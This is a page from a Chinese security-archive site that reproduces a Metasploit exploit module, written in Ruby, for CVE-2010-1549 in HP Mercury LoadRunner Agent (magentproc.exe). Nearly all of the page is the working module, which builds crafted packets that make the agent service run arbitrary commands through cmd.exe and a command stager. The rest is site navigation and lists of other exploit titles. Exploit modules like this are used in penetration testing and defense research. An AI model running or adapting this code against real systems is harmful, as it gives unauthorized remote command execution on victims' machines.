首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
HP Mercury LoadRunner Agent magentproc.exe - Remote Command Execution (Metasploi
来源:metasploit.com 作者:aushack 发布时间:2018-01-02  
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStager
 
  def initialize(info={})
    super(update_info(info,
      'Name'           => "HP Mercury LoadRunner Agent magentproc.exe Remote Command Execution",
      'Description'    => %q{
        This module exploits a remote command execution vulnerablity in HP LoadRunner before 9.50
        and also HP Performance Center before 9.50. HP LoadRunner 12.53 and other versions are
        also most likely vulneable if the (non-default) SSL option is turned off.
        By sending a specially crafted packet, an attacker can execute commands remotely.
        The service is vulnerable provided the Secure Channel feature is disabled (default).
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown', # Original discovery # From Tenable Network Security
          'aushack'  # metasploit module
        ],
      'References'     =>
        [
          ['CVE', '2010-1549'],
          ['ZDI', '10-080'],
          ['BID', '39965'],
          ['URL', 'https://support.hpe.com/hpsc/doc/public/display?docId=c00912968']
        ],
      'Payload'        => { 'BadChars' => "\x0d\x0a\x00" },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # Note: software reportedly supports Linux - may also be vulnerable.
          ['Windows (Dropper)',
          'Platform'   => 'win',
          'Arch'       => [ARCH_X86, ARCH_X64]
          ],
        ],
      'Privileged'     => false,
      'Stance'         => Msf::Exploit::Stance::Aggressive,
      'DisclosureDate' => 'May 06 2010',
      'DefaultTarget'  => 0))
 
      register_options([Opt::RPORT(54345)])
  end
 
  def autofilter
    true
  end
 
  def execute_command(cmd, _opts = {})
    guid = Rex::Text.encode_base64(Rex::Text.rand_text_alphanumeric(17))
    randstr = Rex::Text.rand_text_alpha(16)
    server_name = Rex::Text.rand_text_alpha(7)
    server_ip = datastore['LHOST']
    server_port = Rex::Text.rand_text_numeric(4)
    # If linux is one day supported, cmd1 = /bin/sh and cmd2 = -c cmd
    cmd1 = "C:\\Windows\\system32\\cmd.exe"
    cmd2 = "/C \"#{cmd}\""
 
    pkt1 = [0x19].pack('N') + guid + '0'
 
    pkt2 = [0x6].pack('N') + [0x0].pack('N') + "(-server_type=8)(-server_name=#{server_name})(-server_full_name=#{server_name})"
    pkt2 << "(-server_ip_name=#{server_ip})(-server_port=#{server_port})(-server_fd_secondary=4)(-guid_identifier=#{guid})\x00\x00"
    pkt2 << [0x7530].pack('N')
 
    pkt3 = [4 + pkt2.length].pack('N') + pkt2
 
    pkt4 = [0x1c].pack('N') + [0x05].pack('N') + [0x01].pack('N') + randstr + pkt3
 
    pkt5 = [pkt4.length].pack('N') + pkt4
 
    pkt6 = [0x437].pack('N') + [0x0].pack('N') + [0x31].pack('N') + [1].pack('N') + [0x31000000].pack('N')
    pkt6 << [cmd1.length].pack('N') + cmd1 + "\x00" + [cmd2.length].pack('N') + cmd2 + [0x0].pack('N') + [0x0].pack('N')
 
    pkt7 = [4 + pkt6.length].pack('N') + pkt6
 
    pkt8 = [0x18].pack('N') + [0x04].pack('N') + randstr + pkt7
 
    pkt9 = [pkt8.length].pack('N') + pkt8
 
    sploit = pkt1 + pkt5 + pkt9
 
    connect
    sock.put(sploit)
    disconnect
 end
 
  def exploit
      print_status('Sending payload...')
      execute_cmdstager(linemax: 1500)
  end
end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·D3DGear 5.00 Build 2175 - Buff
·Cambium ePMP1000 - 'ping' Shel
·NetTransport 2.96L - Buffer Ov
·Cambium ePMP1000 - 'get_chart'
·ALLMediaServer 0.95 - Buffer O
·Huawei Router HG532 - Arbitrar
·pfSense 2.1.3-RELEASE (amd64)
·Linux Kernel < 4.4.0-83 / < 4.
·HP Insight Control For VMware
·Samsung Internet Browser 6.2.0
·Kingsoft Antivirus/Internet Se
·Xplico Remote Code Execution
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved